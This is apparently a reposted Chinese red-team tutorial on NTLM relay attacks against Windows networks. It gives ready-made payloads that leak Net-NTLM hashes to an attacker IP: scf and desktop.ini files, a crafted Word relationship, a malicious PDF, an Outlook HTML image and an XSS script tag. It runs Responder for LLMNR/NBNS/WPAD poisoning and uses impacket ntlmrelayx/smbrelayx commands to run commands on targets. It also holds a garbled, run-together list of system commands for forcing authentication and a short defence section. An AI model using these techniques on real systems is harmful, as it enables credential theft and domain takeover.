本地host文件路径(win7hosts文件位置)

目录

本地host文件路径(win7hosts文件位置)

招聘:关于红队成长的分享【招聘贴】

NTLM Relay其实严格意义上并不能叫NTLM Relay,而是应该叫 Net-NTLM Relay。它是发生在NTLM认证的第三步,在Type3 Response消息中存在Net-NTLM Hash,当攻击者获得了Net-NTLM Hash后,可以进行中间人攻击,重放Net-NTLM Hash,这种攻击手法也就是大家所说的NTLM Relay(NTLM 中继)攻击。

进行NTLM Relay攻击有两步:

第一步是捕获Net-NTLM Hash

第二步是重放Net-NTLM Hash

捕获Net-NTLM Hash

捕获Net-NTLM Hash又有两步:

第一步是需要使目标服务器向攻击者发起NTLM请求

第二步是使用工具来捕获服务器发来的NTLM请求

那么如何能使目标服务器向攻击者发起NTLM请求呢?思路是让受害者自己把Net-NTLM Hash发送给攻击者,也就是说只要是使用SMB、HTTP、LDAP、MSSQL等协议来进行NTLM认证的程序,都可以尝试用来向攻击者发送Net-NTLM Hash。比如浏览器、office word文档、pdf文档、explorer等。如果新发现一个这类应用程序,或者发现这些程序的一种调用方法,就会多出一种攻击手段。几种常见的获取方法如下:

NBNS&LLMNR

NBNS 和 LLMNR 是Microsoft针对工作组和域设计的名称解析协议,主要用于局域网中的名称解析。当DNS解析失败时,Windows系统会使用 NetBIOS 和 LLMNR 搜索名称。这些协议只为本地连接设计。NetBIOS 和LLMNR在WindowsVista以后的系统中均实现,二者的主要区别在于:

NetBIOS基于广播,而LLMNR基于多播;

NetBIOS在WindowsNT以后的所有操作系统上均可用,而只有WindowsVista和更高版本才支持LLMNR;

LLMNR还支持IPv6,而NetBIOS不支持,因此,在启用了IPv6,但对IPv6管理不如IPv4那样细致的复杂网络中,就可能发生更广泛的攻击

LLMNR

NBNS

检查本地 NetBIOS 缓存

如果缓存中没有请求的名称且已配置了 WINS 服务器,接下来则会向 WINS 服务器发出请求

如果没有配置 WINS 服务器或 WINS 服务器无响应则会向当前子网域发送广播

如果发送广播后无任何主机响应则会读取本地的 lmhosts 文件

Windows系统的名称解析顺序如下:

本地hosts文件(%windir%\System32\drivers\etc\hosts)

DNS缓存/DNS服务器

链路本地多播名称解析(LLMNR)和NetBIOS名称服务(NBTNS)

因此只要用户输入一个不能解析的名称,由于本地hosts文件和DNS均不能正常解析该名称。于是会发送LLMNR/NBT-NS数据包请求解析,攻击者收到请求后告诉客户端它是该名称并要求客户端发送Net-NTLMHash进行认证,于是攻击者就可以收到客户端发来的Net-NTLMHash了。

responder -I eth0 -rPv

打印机漏洞

Windows的MS-RPRN协议用于打印客户机和打印服务器之间的通信,默认情况下是启用的。协议定义的RpcRemoteFindFirstPrinterChangeNotificationEx() 调用创建一个远程更改通知对象,该对象监视对打印机对象的更改,并将更改通知发送到打印客户端。任何经过身份验证的域成员都可以连接到远程服务器的打印服务(spoolsv.exe),并请求对一个新的打印作业进行更新,令其将该通知发送给指定目标。之后它会将立即测试该连接,即向指定目标进行身份验证(攻击者可以选择通过Kerberos或NTLM进行验证)。微软表示这个bug是系统设计特点,无需修复。由于打印机是以system权限运行的,所以我们访问打印机RPC,迫使打印机服务向我们发起请求,我们就能拿到目标机器用户的Net-NTLM Hash。

如下,我们执行printerbug.py脚本,使用域内任意用户访问目标机器的打印机服务,此脚本会触发SpoolService Bug,强制Windows主机通过MS-RPRNRPC接口向攻击者进行身份验证。因此我们能收到目标机器向我们发送Net-NTLMHash。在后面我们会讲到利用这个漏洞进行接管域控。

图标

当图标的一些路径属性改成我们的UNC路径的话,我们就能收到目标服务器发来的NTLM请求。

desktop.ini

在每个文件夹底下都有一个隐藏文件desktop.ini,其作用是指定文件夹的图标之类。可以通过修改文件夹属性——>隐藏受保护的操作系统文件(推荐) ,来显示desktop.ini文件。

创建一个test文件夹,然后修改该文件夹的图标为任何其他

然后修改该文件夹的 隐藏受保护的操作系统文件(推荐) 属性,取消勾选

接着就能在test文件夹下看到desktop.ini文件了

将IconResource替换为攻击者的UNC路径

只要有人访问了test文件夹,目标主机就会去请求指定UNC的图标资源,于是该主机会将当前用户的Net-NTLM Hash发送给指定的机器,我们在该机器上使用Responder监听,就能接收到目标机器发来的Net-NTLM Hash了。

用户头像

该功能适用于Windows 10、Windows Server 2016/2019。在更改账户图片处,输入指定的UNC路径

我们就能抓到目标机器的当前用户的Net-NTLM Hash了。

scf文件

只要一个文件夹内含有scf后缀的文件,由于scf文件包含了IconFile属性,所以explore.exe会尝试获取文件夹的图标。而IconFile是支持UNC路径的,所以当打开文件夹的时候,目标主机就会去请求指定UNC的图标资源,于是该主机会将当前用户的NTLM v2 hash发送给指定的机器,我们在该机器上使用Responder监听,就能接收到目标机器发来的Net-NTLM Hash了。以下是scf后缀的文件的格式:

[Shell]Command=2IconFile=UNC路径[Taskbar]Command=ToggleDesktop

创建一个test文件夹,在该文件夹内创建test.scf文件,文件内容如下:

[Shell]Command=2IconFile=\\192.168.106.5\test\test.ico[Taskbar]Command=ToggleDesktop

只要有人访问了test文件夹,目标主机就会去请求指定UNC的图标资源,于是该主机会将当前用户的NTLM v2 hash发送给指定的机器,我们在该机器上使用Responder监听,就能接收到目标机器发来的Net-NTLM Hash了。

Outlook

邮件是支持发送HTML格式邮件的。于是我们可以发送带有如下html payload的邮件:

<p>邮件发送测试…</p><img src=”\\\\192.168.106.5\\test”>

当目标使用的是Windows机器,并且使用的是Outlook客户端打开该邮件的话,我们就能收到目标机器的Net-NTLM Hash。

系统命令

通过执行系统命令,访问指定的UNC路径,来获取目标机器的Net-NTLM Hash。

net.exe use \hostshare attrib.exe \hostsharecacls.exe \hostsharecertreq.exe \hostshare #(noisy, pops an error dialog) certutil.exe \hostsharecipher.exe \hostshareClipUp.exe -l \hostsharecmdl32.exe \hostsharecmstp.exe /s \hostsharecolorcpl.exe \hostshare #(noisy, pops an error dialog)comp.exe /N=0 \hostshare \hostsharecompact.exe \hostsharecontrol.exe \hostshareconvertvhd.exe -source \hostshare -destination \hostshareDefrag.exe \hostsharediskperf.exe \hostsharedispdiag.exe -out \hostsharedoskey.exe /MACROFILE=\hostshareesentutl.exe /k \hostshareexpand.exe \hostshareextrac32.exe \hostshareFileHistory.exe \hostshare #(noisy, pops a gui)findstr.exe * \hostsharefontview.exe \hostshare #(noisy, pops an error dialog)fvenotify.exe \hostshare #(noisy, pops an access denied error)FXSCOVER.exe \hostshare #(noisy, pops GUI)hwrcomp.exe -check \hostsharehwrreg.exe \hostshareicacls.exe \hostshare licensingdiag.exe -cab \hostsharelodctr.exe \hostsharelpksetup.exe /p \hostshare /smakecab.exe \hostsharemsiexec.exe /update \hostshare /quietmsinfo32.exe \hostshare #(noisy, pops a “cannot open” dialog)mspaint.exe \hostshare #(noisy, invalid path to png error)msra.exe /openfile \hostshare #(noisy, error)mstsc.exe \hostshare #(noisy, error)netcfg.exe -l \hostshare -c p -i foo

Office

新建一个word文件,插入一张图片

用压缩软件打开,进入 test.docx\word\_rels 目录,修改document.xml.rels文件

可以看到Target参数是本地的路径,我们修改为指定的UNC路径,然后加上TargetMode=”External”

只要有人访问了该word文档,目标主机就会去请求指定UNC的图片资源,于是该主机会将当前用户的NTLM v2 hash发送给指定的机器,我们在该机器上使用Responder监听,就能接收到目标机器发来的Net-NTLM Hash了。

PDF

PDF文件可以添加一项功能:请求远程SMB服务器的文件。于是乎,利用PDF文件的正常功能够窃取Windows系统的Net-NTLM Hash。当用户使用PDF阅读器打开一份恶意的PDF文档,该PDF会向远程SMB服务器发出请求,如果该远程SMB服务器对数据包进行抓取,就能够获得用户Windows系统的Net-NTLM Hash。

如下,使用脚本往正常的PDF文件中加入请求远程SMB服务器的功能,生成 test.pdf.malicious.pdf 文件。

python2 WorsePDF.py test.pdf 192.168.106.5

经过测试发现,只有使用Adobe PDF阅读器才会发收到Net-NTLM Hash,Chrome、Edge和WPS的PDF阅读器不能收到Net-NTLM Hash。

WPAD

WPAD(Web Proxy Auto-Discovery Protocol) Web代理自动发现协议是用来查找PAC(Proxy Auto-Config)文件的协议,其主要通过DHCP、DNS、LLMNR、NBNS协议来查找存放PAC文件的主机。PAC文件定义了浏览器和其他用户代理如何自动选择适当的代理服务器来访问一个URL,通俗点说就是PAC文件中配置了代理服务器,用户在访问网页时,首先会查询PAC文件的位置,然后获取PAC文件,将PAC文件作为代理配置文件。

浏览器查询PAC文件的顺序如下:

通过DHCP服务器

查询WPAD主机的IP

Hosts

DNS (cache / server)

LLMNR

NBNS

PAC文件的格式如下:

function FindProxyForURL(url, host) { if (url== ‘http://www.baidu.com/’) return ‘DIRECT’; if (host== ‘twitter.com’) return ‘SOCKS 127.0.0.10:7070’; if (dnsResolve(host) == ‘10.0.0.100’) return ‘PROXY 127.0.0.1:8086;DIRECT’; return ‘DIRECT’;}

配合LLMNR/NBNS投毒

一个典型的劫持方式是利用LLMNR/NBNS欺骗来让受害者从攻击者获取PAC文件,PAC文件指定攻击者就是代理服务器,然后攻击者就可以劫持受害者的HTTP流量,在其中插入任意HTML标签。

IE浏览器默认是自动检测设置

受害者通过LLMNR询问WPAD主机的ip,Responder通过LLMNR投毒将WPAD的ip指向Responder所在的服务器

受害者访问 /wpad.dat(Responder此时就能获得目标机器的Net-NTLM Hash,但是这个Responder默认不开,因为害怕会有登录提醒,不利于后面的中间人攻击,可以加上-F开启),然后Responder通过伪造如下PAC文件将代理指向 proxysrv:3141

受害者会使用proxysrv:3141作为代理,但是受害者不知道proxysrv对应的ip是什么,所以会再次查询,Responder再次通过LLMNR投毒进行欺骗。将LLMNR指向Responder本身,然后开始中间人攻击,攻击者可以劫持受害者的HTTP流量,在其中插入任意HTML标签(插入XSS Payload获取Net-NTLM Hash)或者获取cookie等其他数据。

responder -I eth0 -rPvw

然而,微软在2016年发布了MS16-077安全公告,添加了两个重要的保护措施,以缓解这类攻击行为:

系统再也无法通过广播协议来解析WPAD文件的位置,只能通过使用DHCP或DNS协议完成该任务。

更改了PAC文件下载的默认行为,以便当WinHTTP请求PAC文件时,不会自动发送客户端的凭据来响应NTLM或协商身份验证质询。

配合DHCPv6

DHCPv6四步交互过程如下:

DHCP服务器或中继代理回应Advertise消息告知客户端

XSS

当我们能进行xss的时候,可以在网页中插入指定的UNC路径,来获取目标机器的Net-NTLM Hash。

<!doctype html><html lang=”en”><head> <meta charset=”UTF-8″></head><body></body> <script src=”\\192.168.106.5\test”></script></html>

XXE&SSRF

如果目标网站存在XXE或者SSRF漏洞的话,可以尝试访问指定的UNC(\\ip\x或file://ip/x)路径或者指定的HTTP(http://ip/x)路径,看能否接收到Net-NTLM Hash。各个语言触发XXE和SSRF的实现不同,同一门语言也有不同的触发方式,这里就不一一讲了,因为我对各种语言也不熟悉。

重放Net-NTLM Hash

在获取到了目标机器的Net-NTLM Hash后,我们要怎么利用呢?这里有两种利用方式:

使用Hashcat破解Net-NTLM Hash

Relay Net-NTLM Hash

本文主要讲如何Relay Net-NTLM Hash。我们知道,由于NTLM只是底层的认证协议,必须镶嵌在上层应用协议里面,消息的传输依赖于使用NTLM的上层协议,比如SMB、HTTP、LDAP等。因此,我们可以将获取到的Net-NTLM Hash Relay到其他使用NTLM进行认证的应用上。

Relay To SMB

直接Relay到SMB服务器,是最直接简单的方法。可以直接控制该服务器执行任意命令等操作。

这里根据工作组和域环境,有两种场景:

工作组环境:在工作组环境中,工作组中的机器之间相互没有信任关系,除非两台机器的账号密码相同,否则Relay不成功。但是如果账号密码相同的话,为何不直接Pass The Hash攻击呢?因此在工作组环境下,Relay到其他机器不太现实。那么,我们可以Relay到机器自身吗?答案是可以的。但是后来微软在MS08-068补丁中对Relay到自身机器做了限制,严禁Relay到机器自身。道高一尺魔高一丈,这个补丁在CVE-2019-1384(Ghost Potato)被攻击者绕过了。

域环境:在域环境中,默认普通域用户可以登录除域控外的其他所有机器(但是为了安全,企业运维人员通常会限制域用户登录的主机),因此可以将Net-NTLM Hash Relay到域内的其他机器。如果是拿到了域控机器的Net-NTLM Hash,可以Relay到除域控外的其他所有机器(为啥不Relay到其他域控,因为域内只有域控默认开启SMB签名)。

工作组

Relay To Self(MS08-068)

当拿到用户的SMB请求之后,最直接的就是把请求Relay回本身,即Reflect。从而控制机子本身。漏洞危害特别高,该漏洞编号为MS08-068。微软在KB957097补丁里面通过修改SMB身份验证答复的验证方式来防止凭据重播,从而解决了该漏洞。防止凭据重播的做法如下:

在Type 1阶段,主机A访问主机B进行SMB认证的时候,将pszTargetName设置为CIFS/B

在Type 2阶段,主机A拿到主机B发送的Challenge挑战值之后,在lsass进程里面缓存(Challenge,CIFS/B)

在Type 3阶段,主机B在拿到主机A的认证消息之后,会去查询lsass进程里面有没有缓存(Challenge,CIFS/B),如果存在缓存,那么认证失败。

因为如果主机A和主机B是不同主机的话,那么lsass进程里面就不会缓存(Challenge,CIFS/B)。如果是同一台主机的话,那lsass里面就会缓存(Challenge,CIFS/B),这个时候就会认证失败。

Ghost Potato(CVE-2019-1384)

这个漏洞绕过了KB957097补丁里面限制不能Relay回本机的限制。由于在KB957097补丁措施里面这个缓存(Challenge,CIFS/B)是有时效性的,这个时间是300秒,也就是说300秒后,缓存(Challenge,cifs/B)就会被清空,这个时候即使主机A和主机B是同一台主机,那么由于缓存已经被清除,那么lsass进程里面肯定没有(Challenge,CIFS/B)缓存。

shenaniganslabs 放出了漏洞利用poc,基于impacket进行修改,目前只能支持收到http协议请求的情况。该poc在sleep 315秒之后,再发送Type 3认证消息,于是就绕过了KB957097补丁。详情:https://shenaniganslabs.io/2019/11/12/Ghost-Potato.html

该poc实现的效果是在目标机器的启动目录上传指定的文件

python ntlmrelayx.py -t smb://10.211.55.7 -smb2support –gpotato-startup test.txt

域环境

impacket下的smbrelayx.py

./smbrelayx.py -h 10.211.55.7 -c whoami

impacket下的ntlmrelayx.py

./ntlmrelayx.py -t smb://10.211.55.7 -c whoami -smb2support

Responder下的MultiRelay.py脚本

该脚本功能强大,通过ALL参数可以获得一个稳定的shell,还有抓密码等其他功能。

参看有哪些命令

执行系统命令

抓取内存中的密码

Relay To EWS

Exchange认证也支持NTLM SSP的。于是我们可以将SMB流量Relay到Exchange的EWS接口,从而可以进行收发邮件等操作,还可以通过Homepage下发规则达到命令执行的效果。关于Relay To EWS详细利用,我会在后期文章中讲解,主要是使用ntlmRelayToEWS.py脚本。

收发邮件

python2 ntlmRelayToEWS.py -t https://10.211.55.5/EWS/exchange.asmx -r getFolder -f inbox -v

Relay To LDAP

LDAP服务器默认就是域控,LDAP的默认策略是协商签名,而并不是强制签名。也就是说是否签名是由客户端决定的。服务端跟客户端协商是否需要签名,不同的协议要求的不同:

从HTTP协议Relay到LDAP是不要求进行签名的,可以直接进行Relay,如CVE-2018-8581。

从SMB协议Relay到LDAP是要求进行签名的,这时,并不能直接进行Relay。CVE-2019-1040就是绕过了NTLM的MIC消息完整性校验,使得SMB协议Relay到LDAP时不需要签名,从而可以发动攻击。

我们现在就讨论可以Relay到LDAP后有哪些攻击方式:

利用基于资源的约束性委派进行权限提升

Write Dcsync ACL Dump域内哈希

这两种利用方式我会在后面的文章中阐述原理和细节,本文就不细讲了。

NTLM Relay的防御

SMB & LDAP 签名:默认只有域控是开启了SMB签名,而LDAP签名默认策略是协商签名,也就是说是否签名是由客户端决定的。服务端跟客户端协商是否签名。(客户端如果是SMB协议的话,默认要求签名的,如果是webadv或者http协议,是不要求签名的),微软于 2019-09-11 日发布相关通告称微软计划于 2020 年 1 月发布安全更新。为了提升域控制器的安全性,该安全更新将强制开启所有域控制器上 LDAP channel binding 与 LDAP signing 功能。

EAP (Enhanced Protection Authentication):NTLM 认证和一个安全通道进行绑定,在 NTLM 认证过程中,最后的 NTLM 认证数据报文包含一个目标应用服务器的证书摘要,这个摘要使用客户端的 NTLM 值进行签名保护,可以防止伪造证书的攻击。

如果想跟我一起讨论,那快加入我的知识星球吧!https://t.zsxq.com/7MnIAM7

发表评论

登录后才能评论